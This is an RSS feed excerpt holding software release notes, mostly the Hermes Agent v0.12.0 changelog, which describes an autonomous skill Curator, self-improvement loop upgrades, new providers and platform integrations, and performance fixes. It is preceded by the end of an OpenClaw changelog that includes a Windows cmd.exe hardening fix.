<li>Security/Windows: route the <code>.cmd</code>/<code>.bat</code> process wrapper through the shared Windows install-root resolver instead of <code>process.env.ComSpec</code>, so workspace dotenv-blocked <code>SystemRoot</code>/<code>WINDIR</code> overrides and unsafe values like UNC paths or path-lists cannot redirect <code>cmd.exe</code> selection on Windows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378853582" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77472/hovercard" href="https://github.com/openclaw/openclaw/pull/77472">#77472</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Agents/bootstrap: honor <code>BOOTSTRAP.md</code> content injected by <code>agent:bootstrap</code> hooks when deciding whether bootstrap is pending, so hook-provided required setup instructions are included in the system prompt. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4379258956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77501/hovercard" href="https://github.com/openclaw/openclaw/pull/77501">#77501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.12.0 (2026.4.30)]]></title>
<description><![CDATA[Hermes Agent v0.12.0 (v2026.4.30)
Release Date: April 30, 2026
Since v0.11.0: 1,096 commits · 550 merged PRs · 1,270 files changed · 217,776 insertions · 213 community contributors (including co-authors)

The Curator release — Hermes Agent now maintains itself. An autonomous background Curator gr...]]></description>
<link>https://tsecurity.de/de/3488029/downloads/hermes-agent-v0120-2026430/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488029/downloads/hermes-agent-v0120-2026430/</guid>
<pubDate>Tue, 05 May 2026 03:01:28 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.12.0 (v2026.4.30)</h1>
<p><strong>Release Date:</strong> April 30, 2026<br>
<strong>Since v0.11.0:</strong> 1,096 commits · 550 merged PRs · 1,270 files changed · 217,776 insertions · 213 community contributors (including co-authors)</p>
<blockquote>
<p>The Curator release — Hermes Agent now maintains itself. An autonomous background Curator grades, prunes, and consolidates your skill library on its own schedule. The self-improvement loop that reviews what to save got a substantial upgrade. Four new inference providers, a 18th messaging platform, a 19th via Teams plugin, native Spotify + Google Meet integrations, ComfyUI and TouchDesigner-MCP moved from optional to bundled-by-default, and a ~57% cut to visible TUI cold start.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Autonomous Curator</strong> — <code>hermes curator</code> runs as a background agent on the gateway's cron ticker (7-day cycle default). It grades your skill library, consolidates related skills, prunes dead ones, and writes per-run reports to <code>logs/curator/run.json</code> + <code>REPORT.md</code>. Archived skills are classified consolidated-vs-pruned via model + heuristic. Defense-in-depth gates protect bundled/hub skills from mutation. Unified under <code>auxiliary.curator</code> — pick the curator's model in <code>hermes model</code>, manage it from the dashboard. <code>hermes curator status</code> ranks skills by usage (most-used / least-used). (<a href="https://github.com/NousResearch/hermes-agent/pull/17277" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17277/hovercard">#17277</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17307" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17307/hovercard">#17307</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17941" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17941/hovercard">#17941</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17868" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17868/hovercard">#17868</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/18033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18033/hovercard">#18033</a>)</p>
</li>
<li>
<p><strong>Self-improvement loop — substantially upgraded</strong> — The background review fork (the core of Hermes' self-improvement: after each turn it decides what memories/skills to save or update) is now class-first (rubric-based rather than free-form), active-update biased (prefers the skill the agent just loaded), handles <code>references/</code>/<code>templates/</code> sub-files, and properly inherits the parent's live runtime (provider, model, credentials actually propagate). Restricted to memory + skills toolsets so it can't sprawl. Memory providers shut down cleanly. Prior-turn tool messages excluded from the summary so the fork sees a clean context. (<a href="https://github.com/NousResearch/hermes-agent/pull/16026" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16026/hovercard">#16026</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17213" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17213/hovercard">#17213</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16099" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16099/hovercard">#16099</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16569" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16569/hovercard">#16569</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16204" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16204/hovercard">#16204</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15057" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15057/hovercard">#15057</a>)</p>
</li>
<li>
<p><strong>Skill integrations — major expansion</strong> — <strong>ComfyUI v5</strong> with official CLI + REST + hardware-gated local install, moved from optional to <strong>built-in by default</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17610" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17610/hovercard">#17610</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17631/hovercard">#17631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17734" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17734/hovercard">#17734</a>). <strong>TouchDesigner-MCP</strong> bundled by default, expanded with GLSL, post-FX, audio, geometry, and 9 new reference docs (<a href="https://github.com/NousResearch/hermes-agent/pull/16753" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16753/hovercard">#16753</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16624/hovercard">#16624</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16768" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16768/hovercard">#16768</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> + <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>). <strong>Humanizer</strong> skill ports a text-cleaner that strips AI-isms (<a href="https://github.com/NousResearch/hermes-agent/pull/16787" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16787/hovercard">#16787</a>). <strong>claude-design</strong> HTML artifact skill + design-md (Google DESIGN.md spec) + airtable salvage + <code>skill_manage</code> edits in <code>external_dirs</code> + direct-URL skill install + <code>/reload-skills</code> slash command. (<a href="https://github.com/NousResearch/hermes-agent/pull/16358" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16358/hovercard">#16358</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/14876" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14876/hovercard">#14876</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16291" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16291/hovercard">#16291</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17512/hovercard">#17512</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16323" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16323/hovercard">#16323</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17744" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17744/hovercard">#17744</a>)</p>
</li>
<li>
<p><strong>LM Studio — first-class provider</strong> — upgraded from a custom-endpoint alias to a full-blown native provider: dedicated auth, <code>hermes doctor</code> checks, reasoning transport, live <code>/models</code> listing. (Salvage of <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>'s <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344160673" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17061" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17061/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17061">#17061</a>.) (<a href="https://github.com/NousResearch/hermes-agent/pull/17102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17102/hovercard">#17102</a>)</p>
</li>
<li>
<p><strong>Four more new inference providers</strong> — <strong>GMI Cloud</strong> (first-class, salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286662004" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/11955" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/11955/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/11955">#11955</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/isaachuangGMICLOUD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/isaachuangGMICLOUD">@isaachuangGMICLOUD</a>), <strong>Azure AI Foundry</strong> with auto-detection, <strong>MiniMax OAuth</strong> with PKCE browser flow (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323780002" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15203/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15203">#15203</a>), <strong>Tencent Tokenhub</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341143946" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16860" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16860/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16860">#16860</a>). (<a href="https://github.com/NousResearch/hermes-agent/pull/16663" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16663/hovercard">#16663</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15845" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15845/hovercard">#15845</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17524" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17524/hovercard">#17524</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16960" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16960/hovercard">#16960</a>)</p>
</li>
<li>
<p><strong>Pluggable gateway platforms + Microsoft Teams</strong> — the gateway is now a plugin host. Drop-in messaging adapters live outside the core, and Microsoft Teams is the first plugin-shipped platform. (Salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354380493" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17664" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17664/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17664">#17664</a>.) (<a href="https://github.com/NousResearch/hermes-agent/pull/17751" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17751/hovercard">#17751</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17828/hovercard">#17828</a>)</p>
</li>
<li>
<p><strong>Tencent 元宝 (Yuanbao) — 18th messaging platform</strong> — native gateway adapter with text + media delivery. (<a href="https://github.com/NousResearch/hermes-agent/pull/16298" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16298/hovercard">#16298</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17424" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17424/hovercard">#17424</a>)</p>
</li>
<li>
<p><strong>Spotify — native tools + bundled skill + wizard</strong> — 7 tools (play, search, queue, playlists, devices) behind PKCE OAuth, interactive setup wizard, bundled skill, surfacing in <code>hermes tools</code>, cron usage documented. (<a href="https://github.com/NousResearch/hermes-agent/pull/15121" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15121/hovercard">#15121</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15130" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15130/hovercard">#15130</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15154/hovercard">#15154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15180" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15180/hovercard">#15180</a>)</p>
</li>
<li>
<p><strong>Google Meet plugin</strong> — join calls, transcribe, speak, follow up. Realtime OpenAI transport + Node bot server, full pipeline bundled as a plugin. (<a href="https://github.com/NousResearch/hermes-agent/pull/16364" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16364/hovercard">#16364</a>)</p>
</li>
<li>
<p><strong><code>hermes -z</code> one-shot mode + <code>hermes update --check</code></strong> — non-interactive <code>hermes -z &lt;prompt&gt;</code> with <code>--model</code>/<code>--provider</code>/<code>HERMES_INFERENCE_MODEL</code>. <code>hermes update --check</code> preflight. Opt-in pre-update HERMES_HOME backup. (<a href="https://github.com/NousResearch/hermes-agent/pull/15702" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15702/hovercard">#15702</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15704" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15704/hovercard">#15704</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15841" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15841/hovercard">#15841</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16539" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16539/hovercard">#16539</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16566" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16566/hovercard">#16566</a>)</p>
</li>
<li>
<p><strong>Models dashboard tab + in-browser model config</strong> — rich per-model analytics, switch main + auxiliary models from the dashboard. (<a href="https://github.com/NousResearch/hermes-agent/pull/17745" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17745/hovercard">#17745</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17802" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17802/hovercard">#17802</a>)</p>
</li>
<li>
<p><strong>Remote model catalog manifest</strong> — OpenRouter + Nous Portal model catalogs are now pulled from a remote manifest so new models show up without a release. (<a href="https://github.com/NousResearch/hermes-agent/pull/16033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16033/hovercard">#16033</a>)</p>
</li>
<li>
<p><strong>Native multimodal image routing</strong> — images now route based on the model's actual vision capability rather than provider defaults. (<a href="https://github.com/NousResearch/hermes-agent/pull/16506" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16506/hovercard">#16506</a>)</p>
</li>
<li>
<p><strong>Gateway media parity</strong> — native multi-image sending across Telegram, Discord, Slack, Mattermost, Email, and Signal; centralized audio routing with FLAC support + Telegram document fallback. (<a href="https://github.com/NousResearch/hermes-agent/pull/17909" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17909/hovercard">#17909</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17833" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17833/hovercard">#17833</a>)</p>
</li>
<li>
<p><strong>TUI catches up to (and past) the classic CLI</strong> — LaTeX rendering (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>), <code>/reload</code> .env hot-reload, pluggable busy-indicator styles (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304012946" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/13610" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/13610/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/13610">#13610</a>), opt-in auto-resume of last session, expanded light-terminal auto-detection, session delete from <code>/resume</code> picker with <code>d</code>, modified mouse-wheel line scroll, and a <code>/mouse</code> toggle that kills ConPTY's phantom mouse injection (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevin-ho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevin-ho">@kevin-ho</a>). (<a href="https://github.com/NousResearch/hermes-agent/pull/17175" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17175/hovercard">#17175</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17286/hovercard">#17286</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17150" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17150/hovercard">#17150</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17130" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17130/hovercard">#17130</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17113" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17113/hovercard">#17113</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17668" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17668/hovercard">#17668</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17669" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17669/hovercard">#17669</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15488" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15488/hovercard">#15488</a>)</p>
</li>
<li>
<p><strong>Observability + achievements plugins</strong> — bundled Langfuse observability plugin (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340873858" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16845" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16845/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16845">#16845</a>) + bundled hermes-achievements plugin that scans full session history. (<a href="https://github.com/NousResearch/hermes-agent/pull/16917" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16917/hovercard">#16917</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17754" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17754/hovercard">#17754</a>)</p>
</li>
<li>
<p><strong>TTS provider registry + Piper local TTS</strong> — pluggable <code>tts.providers.&lt;name&gt;</code> registry; Piper ships as a native local TTS provider. (Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248924949" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/8508" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/8508/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/8508">#8508</a>.) (<a href="https://github.com/NousResearch/hermes-agent/pull/17843" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17843/hovercard">#17843</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17885" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17885/hovercard">#17885</a>)</p>
</li>
<li>
<p><strong>Vercel Sandbox backend</strong> — Vercel sandboxes as an execute_code/terminal backend (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>). (<a href="https://github.com/NousResearch/hermes-agent/pull/17445" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17445/hovercard">#17445</a>)</p>
</li>
<li>
<p><strong>Secret redaction off by default</strong> — default flipped to off. Prevents the long-standing patch-corruption incidents where fake secret-shaped substrings mangled tool outputs. Opt in via <code>redaction.enabled: true</code> when you need it. (<a href="https://github.com/NousResearch/hermes-agent/pull/16794" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16794/hovercard">#16794</a>)</p>
</li>
<li>
<p><strong>Cold-start performance</strong> — visible TUI cold start cut <strong>~57%</strong> via lazy agent init (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>), lazy imports of OpenAI / Anthropic / Firecrawl / account_usage, mtime-cached <code>load_config()</code>, memoized <code>get_tool_definitions()</code> with TTL-cached <code>check_fn</code> results, precompiled dangerous-command patterns. (<a href="https://github.com/NousResearch/hermes-agent/pull/17190" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17190/hovercard">#17190</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17046" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17046/hovercard">#17046</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17041" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17041/hovercard">#17041</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17098" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17098/hovercard">#17098</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17206" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17206/hovercard">#17206</a>)</p>
</li>
<li>
<p><strong>Configurable prompt cache TTL</strong> — <code>prompt_caching.cache_ttl</code> (5m default, 1h opt-in — cost savings for bursty sessions that keep cache warm). Salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291700892" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/12659" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/12659/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/12659">#12659</a>. (<a href="https://github.com/NousResearch/hermes-agent/pull/15065" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15065/hovercard">#15065</a>)</p>
</li>
</ul>
<hr>
<h2>🧠 Autonomous Curator &amp; Self-Improvement Loop</h2>
<h3>Curator — autonomous skill maintenance</h3>
<ul>
<li><strong><code>hermes curator</code> as a background agent</strong> — runs on the gateway's cron ticker, 7-day cycle by default, umbrella-first prompt, inherits parent config, unbounded iterations (<a href="https://github.com/NousResearch/hermes-agent/pull/17277" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17277/hovercard">#17277</a> — issue <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245103682" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/7816" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/7816/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/7816">#7816</a>)</li>
<li><strong>Per-run reports</strong> — <code>logs/curator/run.json</code> + <code>REPORT.md</code> per cycle (<a href="https://github.com/NousResearch/hermes-agent/pull/17307" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17307/hovercard">#17307</a>)</li>
<li><strong>Consolidated vs pruned classification</strong> — archived skills split with model + heuristic (<a href="https://github.com/NousResearch/hermes-agent/pull/17941" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17941/hovercard">#17941</a>)</li>
<li><strong><code>hermes curator status</code></strong> — ranks skills by usage, shows most-used and least-used (<a href="https://github.com/NousResearch/hermes-agent/pull/18033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18033/hovercard">#18033</a>)</li>
<li><strong>Unified under <code>auxiliary.curator</code></strong> — pick the model in <code>hermes model</code>, configure from the dashboard (<a href="https://github.com/NousResearch/hermes-agent/pull/17868" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17868/hovercard">#17868</a>)</li>
<li><strong>Documentation</strong> — dedicated curator feature page on the docs site (<a href="https://github.com/NousResearch/hermes-agent/pull/17563" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17563/hovercard">#17563</a>)</li>
<li>Fix: seed defaults on update, create <code>logs/curator/</code> directory, defer fire import (<a href="https://github.com/NousResearch/hermes-agent/pull/17927" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17927/hovercard">#17927</a>)</li>
<li>Fix: scan nested archive subdirs in <code>restore_skill</code> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xDevNinja/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xDevNinja">@0xDevNinja</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17951" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17951/hovercard">#17951</a>)</li>
<li>Fix: use actual skill activity in curator status (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/y0shua1ee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/y0shua1ee">@y0shua1ee</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17953/hovercard">#17953</a>)</li>
<li>Fix: <code>skill_manage</code> refuses writes on pinned skills; pinning now blocks curator writes (<a href="https://github.com/NousResearch/hermes-agent/pull/17562" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17562/hovercard">#17562</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17578/hovercard">#17578</a>)</li>
<li>Fix: <code>bump_use()</code> wired into skill invocation + preload + skill_view (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355610788" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17782" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/17782/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/17782">#17782</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17932" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17932/hovercard">#17932</a>)</li>
</ul>
<h3>Self-improvement loop (background review fork)</h3>
<ul>
<li><strong>Class-first skill-review prompt</strong> — rubric-based grading rather than free-form "should this update" (<a href="https://github.com/NousResearch/hermes-agent/pull/16026" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16026/hovercard">#16026</a>)</li>
<li><strong>Active-update bias</strong> — prefers updating skills the agent just loaded, handles <code>references/</code> + <code>templates/</code> sub-files (<a href="https://github.com/NousResearch/hermes-agent/pull/17213" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17213/hovercard">#17213</a>)</li>
<li><strong>Fork inherits parent's live runtime</strong> — provider, model, credentials actually propagate now (<a href="https://github.com/NousResearch/hermes-agent/pull/16099" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16099/hovercard">#16099</a>)</li>
<li><strong>Scoped toolsets</strong> — review fork restricted to memory + skills (no shell, no web) (<a href="https://github.com/NousResearch/hermes-agent/pull/16569" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16569/hovercard">#16569</a>)</li>
